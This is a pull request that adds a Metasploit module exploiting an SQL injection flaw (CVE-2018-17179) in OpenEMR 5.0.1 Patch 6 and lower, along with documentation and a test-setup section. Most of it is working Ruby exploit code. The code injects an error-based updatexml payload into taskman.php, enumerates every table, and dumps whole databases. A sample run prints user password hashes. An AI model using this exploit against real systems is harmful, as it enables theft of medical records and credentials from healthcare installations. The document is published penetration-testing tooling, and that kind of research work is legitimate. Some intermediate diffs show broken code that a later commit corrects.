### PR TITLE
Add an auxiliary module to exploit OpenEMR CVE-2018-17179.

### DIFF
--- a/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md
+++ b/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md
@@ -1,0 +1,86 @@
+## Intro
+
+This module exploits a SQLi vulnerability found in
+OpenEMR version 5.0.1 Patch 6 and lower. The
+vulnerability allows the contents of the entire
+database (with exception of log and task tables) to be
+extracted.
+
+This module saves each table as a \'.csv\' file in your
+loot directory and has been tested with
+OpenEMR 5.0.1 (3).
+
+
+## Author
+
+Will Porter (will.porter@lodestonesecurity.com) from Lodestone Security
+
+
+## References
+
+https://www.cvedetails.com/cve/CVE-2018-17179/
+https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617
+
+
+## Options
+
+```
+msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > show options
+
+Module options (auxiliary/sqli/openemr/openemr_sqli_dump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target address range or CIDR identifier
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /openemr         yes       The base path to the OpenEMR installation
+   VHOST                       no        HTTP server virtual host
+```
+
+## Usage
+
+This module has both `check` and `run` functions.
+
+```
+msf5 > use auxiliary/sqli/openemr/openemr_sqli_dump
+msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > check
+
+[*] Trying to detect installed version
+[*] 127.0.0.1:80 - The target appears to be vulnerable.
+msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > run
+[*] Running module against 127.0.0.1
+
+[*] DB Version: 10.3.15-MariaDB-1
+[*] Enumerating Tables, this may take a moment...
+[*] Identified 310 tables.
+[*] Created dump directory: /root/.msf4/loot/openemr-a323pl20
+[*] Dumping table (1/310): ALL_PLUGINS
+[*] Dumping table (2/310): APPLICABLE_ROLES
+[*] Dumping table (3/310): CHARACTER_SETS
+[*] Dumping table (4/310): CHECK_CONSTRAINTS
+[*] Dumping table (5/310): COLLATIONS
+
+...
+
+[*] Dumping table (305/310): medex_recalls
+[*] Dumping table (306/310): syndromic_surveillance
+[*] Dumping table (307/310): lang_constants
+[*] Dumping table (308/310): gacl_acl_seq
+[*] Dumping table (309/310): background_services
+[*] Dumping table (310/310): geo_country_reference
+[*] Dumped all tables to /root/.msf4/loot/openemr-a323pl20
+[*] Auxiliary module execution completed
+msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > exit
+
+root@localhost:/tmp# cd /root/.msf4/loot/openemr-a323pl20
+root@localhost:~/.msf4/loot/openemr-a323pl20# cat users_secure.csv
+id,username,password,salt,last_update,password_history1,salt_history1,password_history2,salt_history2
+1,admin,$2a$05$bxcQWy1ZeIwV2/ScGBQlTOeUVqJo9MdvHuF1mBs4Jo7H0/bFpZoPK,$2a$05$bxcQWy1ZeIwV2/ScGBQlTZ$,2019-08-27 20:07:13,"","","",""
+4,johndoemsf,$2a$05$gUWCtnsoqPBbn5zKiasyaOphgJwkA9BySy7LnK3BswyWt0RrLb0Ma,$2a$05$gUWCtnsoqPBbn5zKiasyaQ$,2019-08-29 02:01:28,"","","",""
+6,johnderp,$2a$05$nAHQ7japfATDqqgArPImlu5svMG79W1nj1SNBpE7xkEhS42.AvlWq,$2a$05$nAHQ7japfATDqqgArPImlv$,2019-08-29 02:02:32,"","","",""
+7,janedoemsf,$2a$05$uv85uBLeAOWQWWl9hHGL0uUy1KZSTgNGbZfJ9o8Lg0ILuSeGCNDbm,$2a$05$uv85uBLeAOWQWWl9hHGL06$,2019-08-29 02:09:37,"","","",""
+```

--- a/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md
+++ b/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md
@@ -6,7 +6,7 @@ vulnerability allows the contents of the entire
 database (with exception of log and task tables) to be
 extracted.
 
-This module saves each table as a \'.csv\' file in your
+This module saves each table as a `.csv` file in your
 loot directory and has been tested with
 OpenEMR 5.0.1 (3).
 

--- a/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md
+++ b/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md
@@ -57,7 +57,6 @@ msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > run
 [*] DB Version: 10.3.15-MariaDB-1
 [*] Enumerating Tables, this may take a moment...
 [*] Identified 310 tables.
-[*] Created dump directory: /root/.msf4/loot/openemr-a323pl20
 [*] Dumping table (1/310): ALL_PLUGINS
 [*] Dumping table (2/310): APPLICABLE_ROLES
 [*] Dumping table (3/310): CHARACTER_SETS
@@ -72,12 +71,12 @@ msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > run
 [*] Dumping table (308/310): gacl_acl_seq
 [*] Dumping table (309/310): background_services
 [*] Dumping table (310/310): geo_country_reference
-[*] Dumped all tables to /root/.msf4/loot/openemr-a323pl20
+[*] Dumped all tables to /root/.msf4/loot
 [*] Auxiliary module execution completed
 msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > exit
 
-root@localhost:/tmp# cd /root/.msf4/loot/openemr-a323pl20
-root@localhost:~/.msf4/loot/openemr-a323pl20# cat users_secure.csv
+root@localhost:/tmp# cd /root/.msf4/loot
+root@localhost:~/.msf4/loot# cat 20190904164551_default_127.0.0.1_openemr.db.users_659759.bin
 id,username,password,salt,last_update,password_history1,salt_history1,password_history2,salt_history2
 1,admin,$2a$05$bxcQWy1ZeIwV2/ScGBQlTOeUVqJo9MdvHuF1mBs4Jo7H0/bFpZoPK,$2a$05$bxcQWy1ZeIwV2/ScGBQlTZ$,2019-08-27 20:07:13,"","","",""
 4,johndoemsf,$2a$05$gUWCtnsoqPBbn5zKiasyaOphgJwkA9BySy7LnK3BswyWt0RrLb0Ma,$2a$05$gUWCtnsoqPBbn5zKiasyaQ$,2019-08-29 02:01:28,"","","",""

--- a/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md
+++ b/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md
@@ -75,8 +75,24 @@ msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > run
 [*] Auxiliary module execution completed
 msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > exit
 
-root@localhost:/tmp# cd /root/.msf4/loot
-root@localhost:~/.msf4/loot# cat 20190904164551_default_127.0.0.1_openemr.db.users_659759.bin
+root@localhost:/# cd /root/.msf4/loot
+root@localhost:~/.msf4/loot# ls -l
+
+-rw-rw-r-- 1 root root   207 Sep 11 01:33 20190911013307_default_127.0.0.1_openemr.ALL_PLUG_118002.bin
+-rw-rw-r-- 1 root root    42 Sep 11 01:33 20190911013308_default_127.0.0.1_openemr.APPLICAB_752726.bin
+-rw-rw-r-- 1 root root    59 Sep 11 01:33 20190911013309_default_127.0.0.1_openemr.CHARACTE_047422.bin
+-rw-rw-r-- 1 root root    77 Sep 11 01:33 20190911013309_default_127.0.0.1_openemr.CHECK_CO_374587.bin
+-rw-rw-r-- 1 root root    68 Sep 11 01:33 20190911013310_default_127.0.0.1_openemr.COLLATIO_513047.bin
+
+...
+
+-rw-rw-r-- 1 root root    37 Sep 11 01:47 20190911014756_default_127.0.0.1_openemr.syndromi_322156.bin
+-rw-rw-r-- 1 root root     3 Sep 11 01:47 20190911014757_default_127.0.0.1_openemr.gacl_acl_006027.bin
+-rw-rw-r-- 1 root root    22 Sep 11 01:47 20190911014757_default_127.0.0.1_openemr.lang_con_639806.bin
+-rw-rw-r-- 1 root root   139 Sep 11 01:47 20190911014759_default_127.0.0.1_openemr.backgrou_037369.bin
+-rw-rw-r-- 1 root root  5462 Sep 11 01:48 20190911014846_default_127.0.0.1_openemr.geo_coun_668990.bin
+
+root@localhost:~/.msf4/loot# cat 20190911014115_default_127.0.0.1_openemr.users_se_735944.bin
 id,username,password,salt,last_update,password_history1,salt_history1,password_history2,salt_history2
 1,admin,$2a$05$bxcQWy1ZeIwV2/ScGBQlTOeUVqJo9MdvHuF1mBs4Jo7H0/bFpZoPK,$2a$05$bxcQWy1ZeIwV2/ScGBQlTZ$,2019-08-27 20:07:13,"","","",""
 4,johndoemsf,$2a$05$gUWCtnsoqPBbn5zKiasyaOphgJwkA9BySy7LnK3BswyWt0RrLb0Ma,$2a$05$gUWCtnsoqPBbn5zKiasyaQ$,2019-08-29 02:01:28,"","","",""

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -200,9 +200,12 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def save_csv(data, table)
-    safe_table = table.gsub(/[^0-9a-z]/i, '')
+    # Use the same gsub pattern as store_loot
+    # this will put the first 8 safe characters of the tablename
+    # in the filename in the loot directory
+    safe_table = table.gsub(/[^a-z0-9\.\_]+/i, '')
     store_loot(
-      "openemr.db.#{safe_table}.dump",
+      "openemr.#{safe_table}.dump",
       'application/CSV',
       rhost,
       csv_string(data),

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_response(payload)
-    path = "#{uri}/interface/forms/eye_mag/taskman.php?"
+    path = "#{uri}/interface/forms/eye_mag/taskman.php"
     # This is only going to work for spaces.  Ideally we could use URI.encode
     # but that is deprecated and CGI.escape uses + which doesn't work
     # for this application.

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -1,0 +1,235 @@
+# frozen_string_literal: true
+
+require 'csv'
+require 'nokogiri'
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name' => 'OpenEMR 5.0.1 Patch 6 SQLi Dump',
+                      'Description' => '
+                        This module exploits a SQLi vulnerability found in
+                        OpenEMR version 5.0.1 Patch 6 and lower. The
+                        vulnerability allows the contents of the entire
+                        database (with exception of log and task tables) to be
+                        extracted.
+                        This module saves each table as a \'.csv\' file in your
+                        loot directory and has been tested with
+                        OpenEMR 5.0.1 (3).
+                      ',
+                      'License' => MSF_LICENSE,
+                      'Author' =>
+                        [
+                          'Will Porter <will.porter[at]lodestonesecurity.com>'
+                        ],
+                      'References' => [
+                        ['CVE', 'CVE-2018-17179'],
+                        ['URL', 'https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617']
+                      ],
+                      'Platform' => ['php'],
+                      'Arch' => ARCH_PHP,
+                      'Targets' =>
+                        [
+                          ['OpenEMR < 5.0.1 (6)', {}]
+                        ],
+                      'Privileged' => false,
+                      'DisclosureDate' => 'May 17 2019',
+                      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the OpenEMR installation', '/openemr'])
+      ]
+    )
+  end
+
+  def uri
+    target_uri.path
+  end
+
+  def openemr_version
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(uri, 'admin.php')
+    )
+    vprint_status("admin.php response code: #{res.code}")
+    document = Nokogiri::HTML(res.body)
+    document.css('tr')[1].css('td')[3].text
+  rescue StandardError
+    ''
+  end
+
+  def check
+    # Check version
+    print_status('Trying to detect installed version')
+    version = openemr_version
+    return Exploit::CheckCode::Unknown if version.empty?
+
+    vprint_status("Version #{version} detected")
+    version.sub! ' (', '.'
+    version.sub! ')', ''
+    version.strip!
+
+    return Exploit::CheckCode::Safe unless Gem::Version.new(version) < Gem::Version.new('5.0.1.7')
+
+    Exploit::CheckCode::Appears
+  end
+
+  def get_response(payload)
+    path = "#{uri}/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' and updatexml(1,concat(0x7e, (#{payload})),0) or '"
+    # This is only going to work for spaces.  Ideally we could use URI.encode
+    # but that is deprecated and CGI.escape uses + which doesn't work
+    # for this application.
+    path = path.gsub ' ', '%20'
+    response = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(path)
+    )
+    response.body
+  end
+
+  def parse_xpath_error(response_body)
+    matches = response_body.match %r{.*XPATH syntax error: '~(.*)'</font.*$}
+    return matches[1] if matches
+
+    nil
+  end
+
+  def exec_payload_and_parse(payload)
+    parse_xpath_error(get_response(payload))
+  end
+
+  def complete_where_clause(where_clause, not_in_clause)
+    where_clause ||= ''
+    if !where_clause.empty? && !not_in_clause.empty?
+      where_clause = 'WHERE ' + where_clause + ' AND ' + not_in_clause
+    elsif where_clause.empty? && !not_in_clause.empty?
+      where_clause = 'WHERE ' + not_in_clause
+    elsif !where_clause.empty? && not_in_clause.empty?
+      where_clause = 'WHERE ' + where_clause
+    end
+    where_clause
+  end
+
+  def fetch_complete(column_name, table_name, where_condition, not_in_clause)
+    offset = 0
+    reconstructed_value = ''
+    loop do
+      where_clause = complete_where_clause(where_condition, not_in_clause)
+      payload = "SELECT SUBSTRING(#{column_name}, #{(offset * 31) + 1}) FROM #{table_name} #{where_clause} LIMIT 1"
+      value = exec_payload_and_parse(payload)
+      reconstructed_value += value unless value.nil?
+      break if value.nil? || value.empty? || value.length < 31
+
+      offset += 1
+    end
+    reconstructed_value
+  end
+
+  def enumerate_iteratively(column_name, table_name, where_condition)
+    values = []
+
+    loop do
+      values_sql_string = "'" + values.join("','") + "'"
+      not_in_clause = !values.empty? ? "#{column_name} NOT IN (#{values_sql_string})" : ''
+      value = fetch_complete(column_name, table_name, where_condition, not_in_clause)
+      break if value.nil? || value.empty?
+
+      values.push(value)
+    end
+    values
+  end
+
+  def enumerate_tables
+    enumerate_iteratively('table_name',
+                          'information_schema.TABLES',
+                          '')
+  end
+
+  def enumerate_columns(table)
+    enumerate_iteratively('column_name',
+                          'information_schema.COLUMNS',
+                          "table_name = '#{table}'")
+  end
+
+  def find_primary_key(table)
+    fetch_complete('column_name',
+                   'information_schema.KEY_COLUMN_USAGE',
+                   "table_name = '#{table}' AND CONSTRAINT_NAME ='PRIMARY'",
+                   '')
+  end
+
+  def walk_table(table)
+    primary_key = find_primary_key(table)
+    columns = enumerate_columns(table)
+
+    return if primary_key.nil?
+
+    key_values = enumerate_iteratively(primary_key,
+                                       table,
+                                       '')
+
+    data = [columns]
+    key_values.each do |key_value|
+      row = []
+      columns.each do |column|
+        where_condition = "#{primary_key} = #{key_value}"
+        value = fetch_complete(column, table, where_condition, '')
+        row.append(value)
+      end
+      data.append(row)
+    end
+    data
+  end
+
+  def save_csv(data, filename)
+    CSV.open(filename, 'w+') do |csv|
+      data.each do |row|
+        csv << row
+      end
+    end
+  end
+
+  def dump_all
+    payload = 'version()'
+    db_version = exec_payload_and_parse(payload)
+    print_status("DB Version: #{db_version}")
+    print_status('Enumerating Tables, this may take a moment...')
+    tables = enumerate_tables
+    num_tables = tables.length
+    print_status("Identified #{num_tables} tables.")
+
+    count = 1
+    rand_token = rand(36**8).to_s(36)
+    dump_dir = File.join(Msf::Config.loot_directory, 'openemr-' + rand_token)
+    Dir.mkdir dump_dir
+    print_status("Created dump directory: #{dump_dir}")
+
+    # These tables are impossible to fetch because they increase each request
+    skiptables = %w[form_taskman log log_comment_encrypt]
+    tables.each do |table|
+      if !skiptables.include?(table)
+
+        print_status("Dumping table (#{count}/#{num_tables}): #{table}")
+        table_data = walk_table(table)
+        table_data_file_path = File.join(dump_dir, table + '.csv')
+        save_csv(table_data, table_data_file_path)
+      else
+        print_status("Skipping table (#{count}/#{num_tables}): #{table}")
+      end
+
+      count += 1
+    end
+    print_status("Dumped all tables to #{dump_dir}")
+  end
+
+  def run
+    dump_all
+  end
+end

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -195,13 +195,20 @@ class MetasploitModule < Msf::Auxiliary
     data
   end
 
+  def csv_string(data)
+    s = ''
+    for row in data
+      s += row.to_csv
+    end
+  end
+
   def save_csv(data, table)
     safe_table = table.gsub(/[^0-9a-z]/i, '')
     store_loot(
       "openemr.db.#{safe_table}.dump",
       'application/CSV',
       rhost,
-      data,
+      csv_string(data),
       table
     )
   end

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -200,6 +200,7 @@ class MetasploitModule < Msf::Auxiliary
     for row in data
       s += row.to_csv
     end
+    s
   end
 
   def save_csv(data, table)

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Auxiliary
     # for this application.
     response = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(path),
+      'uri' => normalize_uri(uri, 'interface', 'forms', 'eye_mag', 'taskman.php'),
       'vars_get' => {
         'action' => 'make_task',
         'from_id' => '1',

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -9,7 +9,6 @@ require 'nokogiri'
 ##
 class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
-  include Msf::Exploit
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -80,9 +80,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_response(payload)
-    # This is only going to work for spaces.  Ideally we could use URI.encode
-    # but that is deprecated and CGI.escape uses + which doesn't work
-    # for this application.
     response = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(uri, 'interface', 'forms', 'eye_mag', 'taskman.php'),

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -84,7 +84,6 @@ class MetasploitModule < Msf::Auxiliary
     # This is only going to work for spaces.  Ideally we could use URI.encode
     # but that is deprecated and CGI.escape uses + which doesn't work
     # for this application.
-    path = path.gsub ' ', '%20'
     response = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(path),
@@ -214,7 +213,7 @@ class MetasploitModule < Msf::Auxiliary
     print_status("Identified #{num_tables} tables.")
 
     count = 1
-    rand_token = rand_text(8)
+    rand_token = Rex::Text.rand_text_alphanumeric(8)
     dump_dir = File.join(Msf::Config.loot_directory, 'openemr-' + rand_token)
     Dir.mkdir dump_dir
     print_status("Created dump directory: #{dump_dir}")

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -209,7 +209,7 @@ class MetasploitModule < Msf::Auxiliary
       'application/CSV',
       rhost,
       csv_string(data),
-      table
+      "{}.csv".format(safe_table)
     )
   end
 

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -198,11 +198,11 @@ class MetasploitModule < Msf::Auxiliary
   def save_csv(data, table)
     safe_table = table.gsub(/[^0-9a-z]/i, '')
     store_loot(
-      "openemr.database.#{safe_table}.dump",
+      "openemr.db.#{safe_table}.dump",
       'application/CSV',
       rhost,
       data,
-      filename
+      table
     )
   end
 

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -80,7 +80,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_response(payload)
-    path = "#{uri}/interface/forms/eye_mag/taskman.php"
     # This is only going to work for spaces.  Ideally we could use URI.encode
     # but that is deprecated and CGI.escape uses + which doesn't work
     # for this application.

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary
                           'Will Porter <will.porter[at]lodestonesecurity.com>'
                         ],
                       'References' => [
-                        ['CVE', 'CVE-2018-17179'],
+                        ['CVE', '2018-17179'],
                         ['URL', 'https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617']
                       ],
                       'Platform' => ['php'],

--- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
+++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -209,7 +209,7 @@ class MetasploitModule < Msf::Auxiliary
       'application/CSV',
       rhost,
       csv_string(data),
-      "{}.csv".format(safe_table)
+      "#{safe_table}.csv"
     )
   end
 


### PR DESCRIPTION
## Intro

This module exploits a SQLi vulnerability found in
OpenEMR version 5.0.1 Patch 6 and lower. The
vulnerability allows the contents of the entire
database (with exception of log and task tables) to be
extracted.

This module saves each table as a \'.csv\' file in your
loot directory and has been tested with
OpenEMR 5.0.1 (3).


## Author

Will Porter (will.porter@lodestonesecurity.com) from Lodestone Security


## References

https://www.cvedetails.com/cve/CVE-2018-17179/
https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617


## Options

```
msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > show options

Module options (auxiliary/sqli/openemr/openemr_sqli_dump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /openemr         yes       The base path to the OpenEMR installation
   VHOST                       no        HTTP server virtual host
```

## Usage

This module has both `check` and `run` functions.

```
msf5 > use auxiliary/sqli/openemr/openemr_sqli_dump
msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > check

[*] Trying to detect installed version
[*] 127.0.0.1:80 - The target appears to be vulnerable.
msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > run
[*] Running module against 127.0.0.1

[*] DB Version: 10.3.15-MariaDB-1
[*] Enumerating Tables, this may take a moment...
[*] Identified 310 tables.
[*] Created dump directory: /root/.msf4/loot/openemr-a323pl20
[*] Dumping table (1/310): ALL_PLUGINS
[*] Dumping table (2/310): APPLICABLE_ROLES
[*] Dumping table (3/310): CHARACTER_SETS
[*] Dumping table (4/310): CHECK_CONSTRAINTS
[*] Dumping table (5/310): COLLATIONS

...

[*] Dumping table (305/310): medex_recalls
[*] Dumping table (306/310): syndromic_surveillance
[*] Dumping table (307/310): lang_constants
[*] Dumping table (308/310): gacl_acl_seq
[*] Dumping table (309/310): background_services
[*] Dumping table (310/310): geo_country_reference
[*] Dumped all tables to /root/.msf4/loot/openemr-a323pl20
[*] Auxiliary module execution completed
msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > exit

root@localhost:/tmp# cd /root/.msf4/loot/openemr-a323pl20
root@localhost:~/.msf4/loot/openemr-a323pl20# cat users_secure.csv
id,username,password,salt,last_update,password_history1,salt_history1,password_history2,salt_history2
1,admin,$2a$05$bxcQWy1ZeIwV2/ScGBQlTOeUVqJo9MdvHuF1mBs4Jo7H0/bFpZoPK,$2a$05$bxcQWy1ZeIwV2/ScGBQlTZ$,2019-08-27 20:07:13,"","","",""
4,johndoemsf,$2a$05$gUWCtnsoqPBbn5zKiasyaOphgJwkA9BySy7LnK3BswyWt0RrLb0Ma,$2a$05$gUWCtnsoqPBbn5zKiasyaQ$,2019-08-29 02:01:28,"","","",""
6,johnderp,$2a$05$nAHQ7japfATDqqgArPImlu5svMG79W1nj1SNBpE7xkEhS42.AvlWq,$2a$05$nAHQ7japfATDqqgArPImlv$,2019-08-29 02:02:32,"","","",""
7,janedoemsf,$2a$05$uv85uBLeAOWQWWl9hHGL0uUy1KZSTgNGbZfJ9o8Lg0ILuSeGCNDbm,$2a$05$uv85uBLeAOWQWWl9hHGL06$,2019-08-29 02:09:37,"","","",""
```

## Test setup
In order to install the OpenEMR software required to test the module the following steps can be taken on a Debian 10 machine:

```
# Download the vulnerable version
wget https://sourceforge.net/projects/openemr/files/OpenEMR%20Ubuntu_debian%20Package/5.0.1/openemr-php7_5.0.1-3_all.deb

# Install it
apt install -y -f ./openemr-php7_5.0.1-3
```
